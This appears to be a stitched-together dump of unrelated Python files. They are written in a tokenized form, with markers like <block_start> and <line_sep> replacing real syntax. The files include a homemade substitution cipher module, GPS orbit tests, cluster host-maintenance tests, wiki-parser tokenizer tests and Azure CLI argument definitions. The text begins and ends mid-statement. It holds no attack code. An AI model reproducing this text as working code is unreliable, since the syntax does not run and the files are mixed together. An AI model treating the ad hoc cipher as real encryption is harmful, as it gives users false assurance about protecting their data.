minor<block_start>'Initialize the String_Crypt object.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>self.__em1=_encode_map_1(major)<line_sep>self.__em2=_encode_map_2(minor)<line_sep>self.__dm1=_decode_map_1(minor)<line_sep>self.__dm2=_decode_map_2(major)<block_end><def_stmt>encode self string<block_start>'Return an encrypted string.'<assert_stmt>isinstance(string str)<line_sep><return>_encode(string self.__em1 self.__em2)<block_end><def_stmt>decode self string<block_start>'Return a decrypted string.'<assert_stmt>isinstance(string str)<and>len(string)%4<eq>0<line_sep><return>_decode(string self.__dm1 self.__dm2)<block_end><block_end>################################################################################ _crypt=_random.SystemRandom()<line_sep>_namer=_random.Random()<line_sep>################################################################################ <def_stmt>_check_major key<block_start>'Private module function.'<assert_stmt>isinstance(key str)<and>len(key)<eq>256<for_stmt>character map(chr 
xrange(256))<block_start><assert_stmt>character<in>key<block_end><block_end><def_stmt>_check_minor key<block_start>'Private module function.'<assert_stmt>isinstance(key str)<and>len(key)<eq>64<line_sep>indexs=[]<for_stmt>byte map(ord key)<block_start><for_stmt>shift xrange(6 -2 -2)<block_start>indexs.append((byte<rshift>shift)&3)<block_end><block_end><for_stmt>index xrange(4)<block_start><assert_stmt>indexs.count(index)<eq>64<block_end><block_end><def_stmt>_encode_map_1 major<block_start>'Private module function.'<line_sep><return>map(ord major)<block_end><def_stmt>_encode_map_2 minor<block_start>'Private module function.'<line_sep>map_2=[[] [] [] []]<line_sep>array=[]<for_stmt>byte map(ord minor)<block_start><for_stmt>shift xrange(6 -2 -2)<block_start>array.append((byte<rshift>shift)&3)<block_end><block_end><for_stmt>byte,index enumerate(array)<block_start>map_2[index].append(chr(byte))<block_end><return>map_2<block_end><def_stmt>_decode_map_1 minor<block_start>'Private module function.'<line_sep>map_1=[]<for_stmt>byte map(ord minor)<block_start><for_stmt>shift xrange(6 -2 -2)<block_start>map_1.append((byte<rshift>shift)&3)<block_end><block_end><return>map_1<block_end><def_stmt>_decode_map_2 major<block_start>'Private module function.'<line_sep>map_2=[<none>]<times>256<for_stmt>byte,index enumerate(map(ord major))<block_start>map_2[index]=chr(byte)<block_end><return>map_2<block_end><def_stmt>_encode string map_1 map_2<block_start>'Private module function.'<line_sep>cache=''<for_stmt>character string<block_start>byte=map_1[ord(character)]<for_stmt>shift xrange(6 -2 -2)<block_start>cache<augadd>map_2[(byte<rshift>shift)&3][_crypt.randrange(64)]<block_end><block_end><return>cache<block_end><def_stmt>_decode string map_1 map_2<block_start>'Private module function.'<line_sep>cache=''<line_sep>iterator=iter(string)<for_stmt>byte iterator<block_start>bits_12=map_1[ord(byte)]<lshift>6<line_sep>bits_34=map_1[ord(iterator.next())]<lshift>4<line_sep>bits_56=map_1[ord(iterator.next())]<lshift>2<line_sep>bits_78=map_1[ord(iterator.next())]<line_sep>cache<augadd>map_2[bits_12+bits_34+bits_56+bits_78]<block_end><return>cache<block_end>################################################################################ <if_stmt>__name__<eq>'__main__'<block_start>_sys.stdout.write('Content-Type: text/plain\n\n')<line_sep>_sys.stdout.write(file(_sys.argv[0]).read())<block_end>
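# --- Usage sketch (not part of the original module): a minimal round trip with the
# SPICE API defined above, assuming the module is importable as "spice" (a
# hypothetical name). The module targets Python 2 (xrange, byte strings), so this
# sketch does too.
import spice

major = spice.crypt_major()    # random 256-byte Major Key
minor = spice.crypt_minor()    # random 64-byte Minor Key

cipher = spice.encode_string('attack at dawn', major, minor)
assert len(cipher) == 4 * len('attack at dawn')             # output is 4x the input
assert spice.decode_string(cipher, major, minor) == 'attack at dawn'

# Named keys are deterministic, so two parties can derive the same key pair:
assert spice.named_major('shared secret') == spice.named_major('shared secret')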
<import_stmt>numpy<as>np<import_stmt>unittest<import_from_stmt>laika.gps_time GPSTime<import_from_stmt>laika AstroDog<line_sep>gps_times_list=[[1950 415621.0] [1895 455457.0] [1885 443787.0]]<line_sep>svIds=['G01' 'G31' 'R08']<line_sep>gps_times=[GPSTime(*gps_time_list)<for>gps_time_list gps_times_list]<class_stmt>TestAstroDog(unittest.TestCase)<block_start>''' def test_nav_vs_orbit_now(self): dog_orbit = AstroDog(pull_orbit=True) dog_nav = AstroDog(pull_orbit=False) gps_time = GPSTime.from_datetime(datetime.utcnow()) - SECS_IN_DAY*2 for svId in svIds: sat_info_nav = dog_nav.get_sat_info(svId, gps_time) sat_info_orbit = dog_orbit.get_sat_info(svId, gps_time) np.testing.assert_allclose(sat_info_nav[0], sat_info_orbit[0], rtol=0, atol=5) np.testing.assert_allclose(sat_info_nav[1], sat_info_orbit[1], rtol=0, atol=.1) np.testing.assert_allclose(sat_info_nav[2], sat_info_orbit[2], rtol=0, atol=1e-7) np.testing.assert_allclose(sat_info_nav[3], sat_info_orbit[3], rtol=0, atol=1e-11) '''<def_stmt>test_nav_vs_orbit__old self<block_start>dog_orbit=AstroDog(pull_orbit=<true>)<line_sep>dog_nav=AstroDog(pull_orbit=<false>)<for_stmt>gps_time gps_times<block_start><for_stmt>svId svIds<block_start>sat_info_nav=dog_nav.get_sat_info(svId gps_time)<line_sep>sat_info_orbit=dog_orbit.get_sat_info(svId gps_time)<line_sep>np.testing.assert_allclose(sat_info_nav[0] sat_info_orbit[0] rtol=0 atol=5)<line_sep>np.testing.assert_allclose(sat_info_nav[1] sat_info_orbit[1] rtol=0 atol=.1)<line_sep>np.testing.assert_allclose(sat_info_nav[2] sat_info_orbit[2] rtol=0 atol=1e-7)<line_sep>np.testing.assert_allclose(sat_info_nav[3] sat_info_orbit[3] rtol=0 atol=1e-11)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
MACS_VERSION="3.0.0a7"<line_sep>MAX_PAIRNUM=1000<line_sep>MAX_LAMBDA=100000<line_sep>FESTEP=20<line_sep>BUFFER_SIZE=100000# np array will increase at step of 1 million items READ_BUFFER_SIZE=10000000# 10M bytes for read buffer size N_MP=2# Number of processers
<import_stmt>common.database<as>db<import_stmt>common.util.urlFuncs<as>urlFuncs<import_stmt>logging<import_stmt>os.path<import_stmt>settings<class_stmt>Clean(object)<block_start><def_stmt>__init__ self<block_start>print("Clean __init__()")<line_sep>self.log=logging.getLogger("Main.Cleaner")<line_sep>super().__init__()<block_end><def_stmt>clean_files self<block_start><with_stmt>db.session_context()<as>sess<block_start>q=sess.query(db.WebFiles).filter(db.WebFiles.fspath<ne><none>)<line_sep>self.log.info("Querying for non-null filepaths...")<line_sep>have=q.all()<line_sep>self.log.info("Have %s local files." len(have))<line_sep>count=0<for_stmt>file have<block_start>fpath=os.path.join(settings.RESOURCE_DIR file.fspath)<if_stmt><not>os.path.exists(fpath)<block_start>self.log.error("Missing file: %s" fpath)<block_end>count<augadd>1<if_stmt>count%1000<eq>0<block_start>self.log.info("Scanned %s files." count)<block_end><block_end><block_end><block_end><block_end>
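# --- Usage sketch (not in the original file): invoking the scan above. Assumes the
# surrounding project supplies common.database, settings.RESOURCE_DIR and logging
# configuration, exactly as the Clean class expects.
if __name__ == '__main__':
    import logging
    logging.basicConfig(level=logging.INFO)
    Clean().clean_files()   # logs an error for every WebFiles row whose file is missing on disk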
<import_stmt>logging<import_stmt>pytest<import_stmt>time<import_from_stmt>tests.integration.host get_host_in_state wait_for_host_state is_host_in_state draining_period_sec <import_from_stmt>peloton_client.pbgen.peloton.api.v0.host host_pb2<as>hpb<import_from_stmt>peloton_client.pbgen.peloton.api.v0.task task_pb2<as>task<line_sep>pytestmark=[pytest.mark.default pytest.mark.preemption pytest.mark.random_order(disabled=<true>) ]<line_sep>log=logging.getLogger(__name__)<line_sep># Tests task kill due to host maintenance with the following scenario # 1. Create a job (with 4 instances) with host affinity constraint (say host A) # All 4 instances should transition to RUNNING # 2. Start Peloton host maintenance on the host A: # The host draining kicks in and the tasks on host A should be killed in # the next host draining cycle. The tasks should transition to PENDING as # host A is DRAINING and there should be no further scheduling on it. <def_stmt>test__start_maintenance_kill_tasks host_affinity_job maintenance# Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<line_sep>host_affinity_job.wait_for_state(goal_state="RUNNING")<def_stmt>all_running <block_start><return>all(t.state<eq>task.RUNNING<for>t host_affinity_job.get_tasks().values())<block_end>host_affinity_job.wait_for_condition(all_running)<line_sep>constraint=host_affinity_job.job_config.defaultConfig.constraint<line_sep>test_host=constraint.labelConstraint.label.value<line_sep>resp=maintenance["start"]([test_host])<assert_stmt>resp<def_stmt>all_pending <block_start><return>all(t.state<eq>task.PENDING<for>t host_affinity_job.get_tasks().values())<block_end># Wait for tasks to be killed and restarted host_affinity_job.wait_for_condition(all_pending)<block_end># Tests a typical host lifecycle. The scenario is as follows # 1. Select a host in UP state. # 2. Start Peloton host maintenance on host A: # a. Host A should immediately transition to DRAINING. # b. Host A should transition to DOWN, latest in the next host draining # cycle. # 3. Complete Maintenance on host A: # Host A should not longer be DOWN. It should transition to UP <def_stmt>test__host_maintenance_lifecycle host_affinity_job maintenance# Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<line_sep># Start maintenance on the selected host resp=maintenance["start"]([test_host])<assert_stmt>resp<line_sep># Wait for host to transition to DOWN wait_for_host_state(test_host hpb.HOST_STATE_DOWN)<line_sep># Complete maintenance on the test hosts resp=maintenance["stop"]([test_host])<assert_stmt>resp<line_sep># Host should no longer be DOWN <assert_stmt><not>is_host_in_state(test_host hpb.HOST_STATE_DOWN)<line_sep>wait_for_host_state(test_host hpb.HOST_STATE_UP)<block_end># Tests the resumption of draining process on resmgr recovery. The scenario is # as follows: # 1. Select a host in UP state: # 2. Start Peloton host maintenance on host A. # 3. Restart resmgr: Before restarting resmgr, jobmgr is stopped to ensure # preemption queue is not polled. 
On resmgr recovery, the # draining process should resume and host should transition # to DOWN <def_stmt>test__host_draining_resumes_on_resmgr_recovery host_affinity_job maintenance jobmgr resmgr # Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<def_stmt>all_running <block_start><return>all(t.state<eq>task.RUNNING<for>t host_affinity_job.get_tasks().values())<block_end>host_affinity_job.wait_for_condition(all_running)<line_sep>constraint=host_affinity_job.job_config.defaultConfig.constraint<line_sep>test_host=constraint.labelConstraint.label.value<line_sep>resp=maintenance["start"]([test_host])<assert_stmt>resp<line_sep># Stop jobmgr to ensure tasks are not killed jobmgr.stop()<line_sep># Sleep for one draining period to ensure maintenance queue is polled time.sleep(draining_period_sec)<line_sep>resmgr.restart()<line_sep>jobmgr.start()<line_sep># Wait for host to transition to DOWN wait_for_host_state(test_host hpb.HOST_STATE_DOWN)<block_end># Tests the resumption of draining process on resmgr recovery. The scenario is # as follows: # 1. Select a host in UP state: # 2. Start Peloton host maintenance on host A. # 3. Restart hostmgr: Before restarting hostmgr, resmgr is stopped to ensure # maintenance queue is not polled. On hostmgr recovery, the # draining process should resume and host should transition # to DOWN <def_stmt>test__host_draining_resumes_on_hostmgr_recovery host_affinity_job maintenance resmgr hostmgr # Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<def_stmt>all_running <block_start><return>all(t.state<eq>task.RUNNING<for>t host_affinity_job.get_tasks().values())<block_end>host_affinity_job.wait_for_condition(all_running)<line_sep>constraint=host_affinity_job.job_config.defaultConfig.constraint<line_sep>test_host=constraint.labelConstraint.label.value<line_sep># Stop resmgr to ensure maintenance queue is not polled resmgr.stop()<line_sep>resp=maintenance["start"]([test_host])<assert_stmt>resp<line_sep>hostmgr.restart()<line_sep>resmgr.start()<line_sep># Wait for host to transition to DOWN wait_for_host_state(test_host hpb.HOST_STATE_DOWN)<block_end>
# Copyright (C) 2012-2016 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. <import_stmt>codecs<import_from_stmt>os listdir path<import_stmt>warnings<import_stmt>pytest<import_from_stmt>mwparserfromhell.parser contexts tokens<import_from_stmt>mwparserfromhell.parser.builder Builder<import_from_stmt>mwparserfromhell.parser.tokenizer Tokenizer<as>PyTokenizer<try_stmt><block_start><import_from_stmt>mwparserfromhell.parser._tokenizer CTokenizer<block_end><except_stmt>ImportError<block_start>CTokenizer=<none><block_end><class_stmt>_TestParseError(Exception)<block_start>"""Raised internally when a test could not be parsed."""<block_end><def_stmt>_parse_test test data<block_start>"""Parse an individual *test*, storing its info in *data*."""<for_stmt>line test.strip().splitlines()<block_start><if_stmt>line.startswith("name:")<block_start>data["name"]=line[len("name:"):].strip()<block_end><elif_stmt>line.startswith("label:")<block_start>data["label"]=line[len("label:"):].strip()<block_end><elif_stmt>line.startswith("input:")<block_start>raw=line[len("input:"):].strip()<if_stmt>raw[0]<eq>'"'<and>raw[-1]<eq>'"'<block_start>raw=raw[1:-1]<block_end>raw=raw.encode("raw_unicode_escape")<line_sep>data["input"]=raw.decode("unicode_escape")<block_end><elif_stmt>line.startswith("output:")<block_start>raw=line[len("output:"):].strip()<try_stmt><block_start>data["output"]=eval(raw vars(tokens))<block_end><except_stmt>Exception<as>err<block_start><raise>_TestParseError(err)<from>err<block_end><block_end><block_end><block_end><def_stmt>_load_tests filename name text<block_start>"""Load all tests in *text* from the file *filename*."""<line_sep>tests=text.split("\n---\n")<for_stmt>test tests<block_start>data={"name":<none> "label":<none> "input":<none> "output":<none>}<try_stmt><block_start>_parse_test(test data)<block_end><except_stmt>_TestParseError<as>err<block_start><if_stmt>data["name"]<block_start>error="Could not parse test '{0}' in '{1}':\n\t{2}"<line_sep>warnings.warn(error.format(data["name"] filename err))<block_end><else_stmt><block_start>error="Could not parse a test in '{0}':\n\t{1}"<line_sep>warnings.warn(error.format(filename err))<block_end><continue><block_end><if_stmt><not>data["name"]<block_start>error="A test in '{0}' was ignored because it lacked a name"<line_sep>warnings.warn(error.format(filename))<line_sep><continue><block_end><if_stmt>data["input"]<is><none><or>data["output"]<is><none><block_start>error=("Test '{}' in '{}' was ignored because it lacked an input or an 
output")<line_sep>warnings.warn(error.format(data["name"] filename))<line_sep><continue><block_end># Include test filename in name data["name"]="{}:{}".format(name data["name"])<line_sep><yield>data<block_end><block_end><def_stmt>build <block_start>"""Load and install all tests from the 'tokenizer' directory."""<line_sep>directory=path.join(path.dirname(__file__) "tokenizer")<line_sep>extension=".mwtest"<for_stmt>filename listdir(directory)<block_start><if_stmt><not>filename.endswith(extension)<block_start><continue><block_end>fullname=path.join(directory filename)<with_stmt>codecs.open(fullname "r" encoding="utf8")<as>fp<block_start>text=fp.read()<line_sep>name=path.split(fullname)[1][:-len(extension)]<line_sep><yield><from>_load_tests(fullname name text)<block_end><block_end><block_end>@pytest.mark.parametrize("tokenizer" filter(<none> (CTokenizer PyTokenizer)) ids=<lambda>t:"CTokenizer"<if>t.USES_C<else>"PyTokenizer" )@pytest.mark.parametrize("data" build() ids=<lambda>data:data["name"])<def_stmt>test_tokenizer tokenizer data<block_start>expected=data["output"]<line_sep>actual=tokenizer().tokenize(data["input"])<assert_stmt>expected<eq>actual<block_end>@pytest.mark.parametrize("data" build() ids=<lambda>data:data["name"])<def_stmt>test_roundtrip data<block_start>expected=data["input"]<line_sep>actual=str(Builder().build(data["output"][:]))<assert_stmt>expected<eq>actual<block_end>@pytest.mark.skipif(CTokenizer<is><none> reason="CTokenizer not available")<def_stmt>test_c_tokenizer_uses_c <block_start>"""make sure the C tokenizer identifies as using a C extension"""<assert_stmt>CTokenizer.USES_C<is><true><assert_stmt>CTokenizer().USES_C<is><true><block_end><def_stmt>test_describe_context <block_start><assert_stmt>""<eq>contexts.describe(0)<line_sep>ctx=contexts.describe(contexts.TEMPLATE_PARAM_KEY|contexts.HAS_TEXT)<assert_stmt>"TEMPLATE_PARAM_KEY|HAS_TEXT"<eq>ctx<block_end>
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # pylint: disable=line-too-long # pylint: disable=too-many-lines # pylint: disable=too-many-statements # pylint: disable=unused-import <import_from_stmt>knack.arguments CLIArgumentType<import_from_stmt>azure.cli.core.commands.parameters tags_type get_enum_type resource_group_name_type get_location_type get_datetime_type <import_from_stmt>azure.cli.core.commands.validators get_default_location_from_resource_group validate_file_or_dict<import_from_stmt>azext_datashare.vendored_sdks.datashare.models._data_share_management_client_enums ShareKind Kind SynchronizationMode SynchronizationKind RecurrenceInterval<import_from_stmt>azext_datashare.manual._validators invitation_id_validator<def_stmt>load_arguments self _<block_start><with_stmt>self.argument_context('datashare account list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)<block_end># modified <with_stmt>self.argument_context('datashare account show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')<block_end># modified <with_stmt>self.argument_context('datashare account create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] help='The name of the share account.')# modified c.argument('location' arg_type=get_location_type(self.cli_ctx) validator=get_default_location_from_resource_group)# modified c.argument('tags' tags_type)# modified c.ignore('identity')<block_end># Only system assigned identity is supported, we can omit this option <with_stmt>self.argument_context('datashare account update')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')# modified c.argument('tags' tags_type)<block_end># modified <with_stmt>self.argument_context('datashare account delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')<block_end><with_stmt>self.argument_context('datashare account wait')<as>c<block_start>c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')<block_end># modified <with_stmt>self.argument_context('datashare list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<block_end><with_stmt>self.argument_context('datashare show')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare create')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified 
c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' options_list=['--name' '-n'] help='The name of the share.')# modified c.argument('description' help='Share description.')# modified c.argument('share_kind' arg_type=get_enum_type(ShareKind) help='Share kind.')# modified c.argument('terms' help='Share terms.')<block_end># modified <with_stmt>self.argument_context('datashare delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare dataset list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare dataset show')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('data_set_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the dataset.')<block_end># modified <with_stmt>self.argument_context('datashare dataset create')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<line_sep>c.argument('data_set_name' options_list=['--name' '-n'] help='The name of the dataset.')# modified c.argument('data_set' options_list=['--dataset'] type=validate_file_or_dict help='Dataset parameters in JSON string or path to JSON file.')<block_end># modified <with_stmt>self.argument_context('datashare dataset delete')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('data_set_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the dataset.')<block_end># modified <with_stmt>self.argument_context('datashare dataset wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('data_set_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the dataset.')<block_end># modified <with_stmt>self.argument_context('datashare invitation list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare invitation 
show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('invitation_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the invitation.')<block_end># modified <with_stmt>self.argument_context('datashare invitation create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<line_sep>c.argument('invitation_name' options_list=['--name' '-n'] help='The name of the invitation.')# modified c.argument('target_active_directory_id' help='The target Azure AD Id. Can\'t be combined with email.')# modified c.argument('target_email' help='The email the invitation is directed to.')# modified c.argument('target_object_id' help='The target user or application Id that invitation is being sent to. Must be specified along TargetActiveDirectoryId. This enables sending invitations to specific users or applications in an AD tenant.')<block_end># modified <with_stmt>self.argument_context('datashare invitation delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('invitation_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the invitation.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization-setting list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare synchronization-setting show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('synchronization_setting_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the synchronizationSetting.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization-setting create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<line_sep>c.argument('synchronization_setting_name' options_list=['--name' '-n'] help='The name of the synchronizationSetting.')# modified c.argument('recurrence_interval' arg_type=get_enum_type(RecurrenceInterval) arg_group='Synchronization Setting' help='Synchronization Recurrence Interval.')<line_sep>c.argument('synchronization_time' arg_group='Synchronization Setting' arg_type=get_datetime_type(help='Synchronization time.'))<line_sep>c.argument('kind' arg_type=get_enum_type(SynchronizationKind) arg_group='Synchronization Setting' default='ScheduleBased' help='Kind of synchronization.')<block_end><with_stmt>self.argument_context('datashare synchronization-setting delete')<as>c<block_start>c.argument('resource_group_name' 
resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('synchronization_setting_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the synchronizationSetting.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization-setting wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('synchronization_setting_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the synchronizationSetting.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization list-detail')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')# modified c.argument('share_name' help='The name of the share.')# modified c.argument('synchronization_id' help='The synchronization GUID.')<block_end><with_stmt>self.argument_context('datashare synchronization list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')# modified c.argument('share_name' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare provider-share-subscription list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare provider-share-subscription show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified TODO validator <with_stmt>self.argument_context('datashare provider-share-subscription revoke')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified <with_stmt>self.argument_context('datashare provider-share-subscription reinstate')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified <with_stmt>self.argument_context('datashare provider-share-subscription wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' 
id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified <with_stmt>self.argument_context('datashare consumer invitation list')<as>c<block_start><pass><block_end><with_stmt>self.argument_context('datashare consumer invitation show')<as>c<block_start>c.argument('location' arg_type=get_location_type(self.cli_ctx))# modified c.argument('invitation_id' validator=invitation_id_validator help='An invitation id')<block_end><with_stmt>self.argument_context('datashare consumer invitation reject')<as>c<block_start>c.argument('location' arg_type=get_location_type(self.cli_ctx))# modified c.argument('invitation_id' validator=invitation_id_validator help='An invitation id')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_subscription_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share subscription.')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription create')<as>c<block_start><import_from_stmt>azure.cli.core.commands.parameters get_location_name_type get_location_completion_list<line_sep>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' options_list=['--name' '-n'] help='The name of the share subscription.')# modified c.argument('invitation_id' validator=invitation_id_validator help='The invitation id.')# modified c.argument('source_share_location' type=get_location_name_type(self.cli_ctx) help='Source share location.' 
completer=get_location_completion_list)<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_subscription_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share subscription.')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription list-source-share-synchronization-setting')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription list-source-dataset')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer 